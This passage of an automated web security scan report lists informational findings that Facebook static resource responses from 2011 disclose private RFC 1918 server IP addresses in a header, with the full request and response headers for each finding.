Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 16 Mar 2010 21:10:31 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 2876
Vary: Accept-Encoding
Cache-Control: public, max-age=20783512
Expires: Fri, 16 Mar 2012 04:09:48 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

/*1300335031,169776068*/

if (window.CavalryLogger) { CavalryLogger.start_js(["ZtuLL"]); }

function EmuController(a,d,b,c){this.impression=d;this.context=b;this.flags=c;this.containerId=a;DataStore.s
...[SNIP]...

24.107. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.185

Request

GET /rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:03:37 GMT
X-FB-Server: 10.138.64.185
Content-Length: 1730
Vary: Accept-Encoding
Cache-Control: public, max-age=30805826
Expires: Tue, 10 Jul 2012 04:09:08 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1310357278,176832697*/

div#pagelet_app_stories .loadingIndicator{display:none;text-align:center}
div#pagelet_app_stories.loading .loadingIndicator{display:block}
#pagelet_games_header .uiHeaderPage
...[SNIP]...

24.108. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/heGhkAidtX0.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yo/r/heGhkAidtX0.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /rsrc.php/v1/yo/r/heGhkAidtX0.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:35:21 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 7368
Vary: Accept-Encoding
Cache-Control: public, max-age=30424615
Expires: Thu, 05 Jul 2012 18:15:40 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1309976210,169775559*/

#address_book_selector .uiHeaderPage{padding-bottom:0}
#address_book_selector .instructions{font-size: 13px}
#address_book_selector h2{font-size: 16px}
#all_or_some_selector{
...[SNIP]...

24.109. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/msTi-EL7vCK.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yo/r/msTi-EL7vCK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.185

Request

GET /rsrc.php/v1/yo/r/msTi-EL7vCK.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 19:10:05 GMT
X-FB-Server: 10.138.64.185
Content-Length: 1749
Vary: Accept-Encoding
Cache-Control: public, max-age=29064935
Expires: Wed, 20 Jun 2012 00:34:17 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1308616380,176832697*/

.actionspro .actionspro_li{border-bottom:1px solid #d8dfea}
.actionspro .actionspro_a{background:transparent;display:block;margin:0;padding:2px 3px;text-decoration:none}
.act
...[SNIP]...

24.110. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/otNsMnT3Ccb.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yo/r/otNsMnT3Ccb.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /rsrc.php/v1/yo/r/otNsMnT3Ccb.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:23:31 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 6587
Vary: Accept-Encoding
Cache-Control: public, max-age=29018137
Expires: Tue, 19 Jun 2012 11:34:20 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1308569759,169776066*/

div.activation_actions_box{background:#fff9d7 none repeat scroll 0 0;margin-bottom:20px;padding:4px 0 12px 0}
div.activation_actions_box a:hover{background-color:#3b5998;colo
...[SNIP]...

24.111. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/aZS2cs-mE5h.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yp/r/aZS2cs-mE5h.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/yp/r/aZS2cs-mE5h.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 14 Jul 2011 01:19:05 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 9439
Vary: Accept-Encoding
Cache-Control: public, max-age=31059494
Expires: Fri, 13 Jul 2012 02:36:11 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

/*1310611024,169776321*/

.fbPhotosTheaterActions a{display:block;margin-bottom:5px}
.fbUndoSpamReport a.fbUndoSpam{display:inline;margin-bottom:0}
.fbPhotosTheaterActionsTag .taggingOn,
.taggingMode
...[SNIP]...

24.112. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/kYoCeJwtttA.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yq/r/kYoCeJwtttA.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.197

Request

GET /rsrc.php/v1/yq/r/kYoCeJwtttA.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/help/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 08 Jul 2011 21:31:25 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Content-Length: 2583
Vary: Accept-Encoding
Cache-Control: public, max-age=30810644
Expires: Tue, 10 Jul 2012 05:28:43 GMT
Date: Tue, 19 Jul 2011 14:57:59 GMT
Connection: close

/*1310362109,169775557*/

if (window.CavalryLogger) { CavalryLogger.start_js(["jxI8t"]); }

function HelpLandingController(a,c,b){copy_properties(this,{elem:a,name:c,isStatic:b});PageTransitions.regis
...[SNIP]...

24.113. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/Ci-JcEcsrg9.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yr/r/Ci-JcEcsrg9.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.183

Request

GET /rsrc.php/v1/yr/r/Ci-JcEcsrg9.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:23:17 GMT
X-FB-Server: 10.138.17.183
Content-Length: 32716
Vary: Accept-Encoding
Cache-Control: public, max-age=30423487
Expires: Thu, 05 Jul 2012 17:56:49 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1309975033,176820663*/

.sidebar{padding-right:176px;overflow:hidden;background:#fff url(http://static.ak.fbcdn.net/rsrc.php/v1/zg/r/YtYaQ6MmfqN.gif) repeat-y top right}
.sidebar.other_side{padding-
...[SNIP]...

24.114. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/LYx7X5wadgo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yr/r/LYx7X5wadgo.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.181

Request

GET /rsrc.php/v1/yr/r/LYx7X5wadgo.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 09 May 2011 02:23:42 GMT
X-FB-Server: 10.138.16.181
Content-Length: 4885
Vary: Accept-Encoding
Cache-Control: public, max-age=25357644
Expires: Tue, 08 May 2012 02:44:56 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

/*1304909021,176820405*/

if (window.CavalryLogger) { CavalryLogger.start_js(["VNmWL"]); }

function startMessagingNavCountUpdater(g){var d=DOM.scry($('sideNav'),'.key-inbox')[0];if(!d)return;var c=DO
...[SNIP]...

24.115. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.197

Request

GET /rsrc.php/v1/ys/r/NoGBEHOl3Wf.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:59:35 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 1738
Vary: Accept-Encoding
Cache-Control: public, max-age=23666131
Expires: Wed, 18 Apr 2012 12:53:01 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

/*1303217638,169776069*/

.MobileMMSEmailSplash_Container{font-size: 12px;color:#444}
.MobileMMSEmailSplash_Left{float:left;font-size: 13px;padding:5px;width:375px}
.MobileMMSEmailSplash_Pic{width:350
...[SNIP]...

24.116. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/PCqjbIZdno-.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ys/r/PCqjbIZdno-.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.186

Request

GET /rsrc.php/v1/ys/r/PCqjbIZdno-.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/directory/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:54:08 GMT
X-FB-Server: 10.138.17.186
Content-Length: 1540
Vary: Accept-Encoding
Cache-Control: public, max-age=23631423
Expires: Wed, 18 Apr 2012 03:14:39 GMT
Date: Tue, 19 Jul 2011 14:57:36 GMT
Connection: close

/*1303182882,176820666*/

.tabs{padding:0;border-bottom:1px solid #898989}
.ff2 .tabs{padding:3px 0}
.tabs.top{background:#f7f7f7}
.tabs .left_tabs{padding-left:10px;float:left}
.tabs .right_tabs{padd
...[SNIP]...

24.117. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/qirUjHNG9oJ.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ys/r/qirUjHNG9oJ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.185

Request

GET /rsrc.php/v1/ys/r/qirUjHNG9oJ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 22 Jun 2011 21:51:39 GMT
X-FB-Server: 10.138.17.185
Content-Length: 4537
Vary: Accept-Encoding
Cache-Control: public, max-age=29595224
Expires: Tue, 26 Jun 2012 03:52:27 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309146667,176820665*/

.confirmation_login_content{margin:15px auto;line-height:15px;width:420px}
.tos_portion{color:#808080;font-size: 9px;margin:10px auto;padding:4px 0;border-top:solid 1px #ccc}
...[SNIP]...

24.118. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/0xUg4sx8bB2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yt/r/0xUg4sx8bB2.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.183

Request

GET /rsrc.php/v1/yt/r/0xUg4sx8bB2.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 21:01:08 GMT
X-FB-Server: 10.138.64.183
Content-Length: 12497
Vary: Accept-Encoding
Cache-Control: public, max-age=31040129
Expires: Thu, 12 Jul 2012 21:13:25 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

/*1310591554,176832695*/

if (window.CavalryLogger) { CavalryLogger.start_js(["8N4Xd"]); }

var ChatUserInfos=window.ChatUserInfos||{};
var FriendLists=window.FriendLists||{get:function(a){var b=Frien
...[SNIP]...

24.119. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/OVLmRskybHj.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yt/r/OVLmRskybHj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/yt/r/OVLmRskybHj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/pages/create.php?ref_type=sitefooter
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 492
Cache-Control: public, max-age=30234535
Expires: Tue, 03 Jul 2012 13:26:43 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1309785932,169775815*/

.sp_4a6jac{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/deIrY85PE2v.png);background-repeat:no-repeat;display:inline-block;height:110px;width:110px}
.sx_bf
...[SNIP]...

24.120. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/gdzYpes5-k7.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yt/r/gdzYpes5-k7.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /rsrc.php/v1/yt/r/gdzYpes5-k7.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 15 Jul 2011 22:52:15 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 48915
Vary: Accept-Encoding
Cache-Control: public, max-age=31219542
Expires: Sat, 14 Jul 2012 23:03:38 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

/*1310770982,169776317*/

if (window.CavalryLogger) { CavalryLogger.start_js(["3cuzy"]); }

function AsyncLayout(){}AsyncLayout.prototype={init:function(b,a,c,d){this.canvas_id=b.id;if(a)this.auxiliar
...[SNIP]...

24.121. http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/7f4SE3bv4B2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yu/r/7f4SE3bv4B2.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.183

Request

GET /rsrc.php/v1/yu/r/7f4SE3bv4B2.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:35:01 GMT
X-FB-Server: 10.138.69.183
Vary: Accept-Encoding
Content-Length: 347
Cache-Control: public, max-age=30807654
Expires: Tue, 10 Jul 2012 04:39:39 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1310359293,176833975*/

.fbQuestionsBlankState{text-align:center}
.questionsList{font-size: 11px}
.questionsList .authorSentence{padding:2px 0 0;font-size: 13px}
.questionsList .questionsListItem{pa
...[SNIP]...

24.122. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/SYIMzW6wi61.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yv/r/SYIMzW6wi61.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.182

Request

GET /rsrc.php/v1/yv/r/SYIMzW6wi61.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 23:36:25 GMT
X-FB-Server: 10.138.17.182
Content-Length: 1238
Vary: Accept-Encoding
Cache-Control: public, max-age=30878569
Expires: Wed, 11 Jul 2012 00:21:31 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1310430068,176820662*/

.groupMember{width:230px;float:left}
.groupProfileHeader{margin-top:5px;padding-bottom:5px}
.groupProfileHeaderContent{margin-bottom:2px;margin-top:-2px;position:relative;z-i
...[SNIP]...

24.123. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/bDUZuV99E60.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yv/r/bDUZuV99E60.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.197

Request

GET /rsrc.php/v1/yv/r/bDUZuV99E60.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:38 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 651
Cache-Control: public, max-age=27434693
Expires: Fri, 01 Jun 2012 03:43:33 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1306986233,169775557*/

.data_archiver{border:1px solid #ccc;padding:45px;width:800px}
.data_archiver_logo{width:180px;height:180px}
h1.marketingHeadlineHuge{font-size: 28px}
h3.col_header{font-size
...[SNIP]...

24.124. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/KL99XeYC7AS.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yw/r/KL99XeYC7AS.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.185

Request

GET /rsrc.php/v1/yw/r/KL99XeYC7AS.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Content-Length: 404
Cache-Control: public, max-age=30423950
Expires: Thu, 05 Jul 2012 18:03:20 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

/*1309975362,176832697*/

.sp_b2am02{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zi/r/PbmUudSYZ0z.png);background-repeat:no-repeat;display:inline-block;height:101px;width:300px}
.sx_82
...[SNIP]...

24.125. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/clJdoaAA7xi.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yx/r/clJdoaAA7xi.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /rsrc.php/v1/yx/r/clJdoaAA7xi.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/terms.php?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sat, 11 Jun 2011 20:48:19 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 2318
Vary: Accept-Encoding
Cache-Control: public, max-age=28654358
Expires: Fri, 15 Jun 2012 06:30:32 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1308205843,169775556*/

if (window.CavalryLogger) { CavalryLogger.start_js(["EYUsQ"]); }

var ResourcePrefetcher={IDLE_TIME:20000,STATUS_UNFETCHED:0,STATUS_FETCHED_T1:100,STATUS_DONE:200,init:functi
...[SNIP]...

24.126. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/POIirpFgl5q.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yy/r/POIirpFgl5q.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/yy/r/POIirpFgl5q.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:54:33 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 2362
Vary: Accept-Encoding
